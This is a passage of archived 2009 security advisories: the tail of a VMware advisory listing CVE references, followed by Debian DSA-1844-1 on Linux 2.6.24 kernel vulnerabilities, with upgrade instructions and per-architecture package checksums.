http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0787 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1439 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1072 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1192 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5966 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2406 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2407 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0746 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0747 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0748 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2848 --- python --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031 --- bind --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696 --- libxml and libxml2 --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416 --- curl -- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417 --- gnutil --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052


  1. Change log

2009-11-20 VMSA-2009-0016 Initial security advisory after release of vCenter 4.0 Update 1 and ESX 4.0 Update 1 on 2009-11-19 and release of vMA Patch 2 on 2009-11-23.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center http://www.vmware.com/security

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/lifecycle/

Copyright 2009 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksHAooACgkQS2KysvBH1xmQMACfTEcnuPanvucXPmgJCTT054o+ dtoAniXz+9xLskrkPr3oUzAcDeV729WG =wSRz -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-1844-1 security@debian.org http://www.debian.org/security/ Dann Frazier July 28, 2009 http://www.debian.org/security/faq


Package : linux-2.6.24 Vulnerability : denial of service/privilege escalation Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2009-1385 CVE-2009-1389 CVE-2009-1630 CVE-2009-1633 CVE-2009-1895 CVE-2009-1914 CVE-2009-1961 CVE-2009-2406 CVE-2009-2407

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation.

CVE-2009-1895

Julien Tinnes and Tavis Ormandy reported and issue in the Linux
vulnerability code. Local users can take advantage of a setuid
binary that can either be made to dereference a NULL pointer or
drop privileges and return control to the user.

CVE-2009-1961

Miklos Szeredi reported an issue in the ocfs2 filesystem.

CVE-2009-2406 CVE-2009-2407

Ramon de Carvalho Valle discovered two issues with the eCryptfs
layered filesystem using the fsfuzzer utility.

For the stable distribution (etch), these problems have been fixed in version 2.6.24-6~etchnhalf.8etch2.

We recommend that you upgrade your linux-2.6.24 packages.

Note: Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' concludes. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, lower severity 2.6.18 and 2.6.24 updates will typically release in a staggered or "leap-frog" fashion.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch2.diff.gz Size/MD5 checksum: 4046697 0c540aa51d64fd0f41fefda0370a7d57 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch2.dsc Size/MD5 checksum: 5117 8149bb152305e615760fd5accc516b17 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb Size/MD5 checksum: 931690 8230f79880ab579b104e9b34029cc97d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb Size/MD5 checksum: 1572166 59bdbfc8850a9eb4c7f09229f8481a04 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb Size/MD5 checksum: 46892520 c736086affec0e829b80074008edc96d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.8etch2_all.deb Size/MD5 checksum: 97696 ac7c8e4af4d15f8e77817f3a2060621e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb Size/MD5 checksum: 4469630 76391a2afe93b14ef942260a2ab0f6c4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb Size/MD5 checksum: 82766 fccf13a8baefeb96443c00718b47178a

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 26737560 705e6c1f456e523e4cd6e2199247ad8a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 27342178 b22b7be9f15a3fcd569e83b0981c7b2b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 3454340 5d9c4195f523265e691a73d165a32bd5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 331144 9b199341a9906f69b92956bee989678f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 330548 2e97270481c6406f4703f7ffc642a306 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 82254 6ef54422427a87fb7013208abbb90bfe http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 26758348 3fa44a2c192d5296abff11160c4143f7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 82234 2d73cbb156467a0e189b66d64d725957 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch2_alpha.deb Size/MD5 checksum: 332176 8abd6e28989d5ffa359dbdf523b8802a

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_amd64.deb Size/MD5 checksum: 82232 f31859776e8c538793ce7bc12e4d16e6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb Size/MD5 checksum: 82238 0dd51e0668293dc4a112ba7c177a2d62 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb Size/MD5 checksum: 355216 e912a184ffa55eefcbf4d075575f956b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_amd64.deb Size/MD5 checksum: 3649934 25d6d6f81163cd422b987cffe8555482 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb Size/MD5 checksum: 19596152 128c3dcd4b54fbca2a8cccf553b15c15

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 308764 081a21f64a1939858fd628b2b17b1e9d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 82362 a02c06864fb8adb347c7b3b83707ec71 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 3937452 4296fde893b88cba41a5164cd6c68266 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 297832 882e93119837e060496995474bfbde0c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 82388 5682b9cb3c9efdf951541c5e951858d5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 9356202 12691f5684650f5f808b4ccc3d77e6f6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 10777668 be1c3aa597e81f449a1712c059b6d219 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 10786276 fdfef0d9f0a0f740cdf096efe4076849 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch2_arm.deb Size/MD5 checksum: 306278 243cc2aef642ad3dc3e6faa9f5b7d2ac

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 259166 403c84cc8eec53736e11babcd7133c36 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 82390 c1e6ec2b43d6dc4849ab58fcca7708fd http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 257800 dcf392b46aaabf4187d0b739d7b3f0b6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 82356 e67f07544c8505aebf46d0fc5cc6ff9b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 258558 a2e28e8a24b42aa4f092218fdb7b24b0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 14371812 91a757a164d87fcca9b7c8dcf9737e52 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 261468 72a0d875029ef878bcfa7734ad0e3221 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 3444724 e4cbc7652241146662a324980caf28e8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 14830286 ee2c1dd21c02e82c845897b92fc44d18 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 13846760 3133b7187049be153f3d946556c58d5a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch2_hppa.deb Size/MD5 checksum: 13335008 a71482e5f95d01ae60ef6f9e84851905

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 19345260 c8d133c7df467610a2b58b02d437f140 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 19349370 99465914e158a8a8095d704c7a4eca58 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 82350 eb75675cf418a8fe18a45cf78e113b14 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 19589510 ed83c2d0ba92a0f4b5fb5daed6b86d5c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 347746 23befd72e069faf404ede7a276b78311 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 3647494 9cf283a4c89c8281db35e5fb2ace4335 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 82384 199633269844e3e36cf936f5a63857a7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 361018 4f7299551139e79ad329057ff07de93d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 359956 5272e0df584721713692ccb80e8fdc45 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 361502 4c9a0586154b5fce6d50610d6728bf75 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch2_i386.deb Size/MD5 checksum: 19278068 41f6b91dceeaba5592a15bdbb4170c3a

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 82360 e96d164aa97cbda5c4e0d4a4d8d47298 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 3570154 a7bdb15fd5dc46ea33b570390700255a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 32289122 8a66a1efccab804aece0f9c9f9a0c2c3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 82378 11c070123743f3060aee864a6fa7621e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 322394 7e68b691385f67de57eca947718b3cf3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 32112122 81952edc15d24552bc7e0e250d4e4c2f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch2_ia64.deb Size/MD5 checksum: 322756 0332b3131abca0dde23a3980e3269d6a

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 22151540 85f675d6aa5e858c776b25ed7b55fd01 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 17152584 968f51589e2246eb98d54f8f7a0deac3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 246524 7d37dee7fa5f20d5484a054697944a4a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 11958562 189d907c882ca1f971e5df5b020db861 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 246320 9b22546464feae45ee05c1318ce4eeb1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 214790 9f3182d818ff7b6a05993763a6120725 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 17168120 bc71f4391f0b74712a77ce0a98104c42 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 82240 56ffbcabce3c1df699ab5005b86b5fcb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 10524568 1dcc5f02fea750b73b3d26bbf9436744 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 309414 2f3e51dd53a0aee437acd14822bdc812 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 82294 9d3e3e23c0fc8a0f1e1841e28fd3a2e2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 3803692 496de2fac6b2631145112d3df8c30a74 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 309366 ad8430704237cac6706abefb3cb3a66a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 225310 6f208c9d5eada9b92d3e98530a7421ab http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb Size/MD5 checksum: 27775866 480af1976cfb2ad886bbeab57828e0a9

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 26985726 697670a3bb624d4d3d78f46f3dd1ffa0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 16630534 64876417bfc90be839f742b7f3df4017 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 82296 3b389589e0d350fd94e1e6a55064b597 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 246006 6b907d81792642929e73f8f7138a0686 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 82244 06ea877ec50d7981c308674e878de0fd http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 21734936 1f58a04e3f3e233fc379f7585b37f67c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 309876 33999e485bc68c26f1355c34591fa9d1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 246316 f5ee5c81b6f69590e7483c63914aa4f1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 13317230 d5c0090dd1f3487c1a1b98e663d302a9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 3803662 c04871193e6cd5fe88e7d757fe94dc15 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 246138 83d394f1c4638687b1bd71213d6fc9fd http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 16566994 4ad893a3f64121974125e7df7a246c32 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb Size/MD5 checksum: 308542 d1aa85d73a85243f9e11e6d319829560

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 17459600 932f0c6e71fa2a92bcbf91245d4a6f34 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 19195098 3894f438fae8ccd897ae1b193e05a06c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 19486104 e186a5e57fc6ef416a9f0611b4e32b00 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 321892 920d908f2b7f39a4ea245a452707de9c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 321508 053a1e68eb59bc3616762c77c478b77c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 3672616 9480b5733676cd5d73e984cd6b36cdb2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 21169994 225176293c099a0a66a6e427f8f342c9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 321100 ed5daac657617ab8ea09dedbbd5825e9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 82240 d5758f3021b63ba5a46f4bb59a0264bd http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 82278 68134af3769b6654c610701382a41932 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch2_powerpc.deb Size/MD5 checksum: 294694 6e01dfd311f1094cb5cf39e6ab13030f

s390 architecture (IBM S/390)

